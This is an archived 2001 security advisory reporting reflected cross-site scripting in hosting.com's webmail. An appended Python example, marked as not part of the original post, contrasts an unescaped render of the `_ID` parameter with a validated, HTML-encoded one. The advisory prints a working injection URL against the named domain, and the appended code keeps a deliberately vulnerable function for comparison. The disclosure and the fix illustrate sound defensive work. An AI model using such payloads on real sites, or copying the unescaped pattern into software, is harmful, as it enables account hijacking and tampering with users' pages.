Hosting.com Cross Site Scripting

From: E M (rdnktrkat_private)
Date: Mon Dec 17 2001 - 16:56:22 PST


    Issue -
    
    Most variables passed to the webmail script used by hosting.com (formerly 
    CTSNet) are echoed back so that script placed in them executes in the 
    local server context.
    
    
    URL  : webmail.cts.com
    
    Example :
    
    http://webmail.cts.com/webmail.cgi?_ID=>document.write("All%20Your%20Webmail%20is%20Belong%20to%20Us");</SCRIPT>
    
    
    Vendor Status : Contacted 12.13.01 - Only automated reply.
    
    Eric McCarty
    rdnktrkat_private
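
The server-side fix for this class of bug, as an added example that is not part of the original post and not the vendor's code: the `_ID` value from the advisory's URL is rendered once unescaped and once validated and HTML-encoded. The HTML templates, the alphanumeric ID format and all function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Query string taken from the advisory's example URL, exactly as archived.
ADVISORY_QUERY = ('_ID=>document.write("All%20Your%20Webmail%20is%20Belong'
                  '%20to%20Us");</SCRIPT>')

# Assumption: a session ID is a short alphanumeric token (real format unknown).
SESSION_ID_RE = re.compile(r"[A-Za-z0-9]{1,64}")

# Hypothetical templates standing in for the webmail page.
FIELD_TEMPLATE = '<input type="hidden" name="_ID" value="%s">'
TEXT_TEMPLATE = "<p>Session: %s</p>"


def get_param(query: str, name: str) -> str:
    """Return the first URL-decoded value of `name`, or '' if absent."""
    params = parse_qs(query, keep_blank_values=True, separator="&")
    return params.get(name, [""])[0]


def render_vulnerable(query: str) -> str:
    """Behaviour the advisory reports: the value is copied into the page as-is."""
    return FIELD_TEMPLATE % get_param(query, "_ID")


def render_hardened(query: str) -> str:
    """Allow-list the value first, then encode it for the attribute context."""
    value = get_param(query, "_ID")
    if not SESSION_ID_RE.fullmatch(value):
        value = ""  # unexpected format: drop it rather than try to clean it
    return FIELD_TEMPLATE % html.escape(value, quote=True)


def render_text_escaped(query: str) -> str:
    """For fields with no fixed format: encode on output, keep the text visible."""
    return TEXT_TEMPLATE % html.escape(get_param(query, "_ID"), quote=True)


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ADVISORY_QUERY))
    print("hardened:  ", render_hardened(ADVISORY_QUERY))
    print("escaped:   ", render_text_escaped(ADVISORY_QUERY))
    print("valid id:  ", render_hardened("_ID=abc123"))
```

Validation handles parameters with a known format; output encoding is what protects every other variable the script reflects.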



    This archive was generated by hypermail 2b30 : Mon Dec 17 2001 - 19:39:10 PST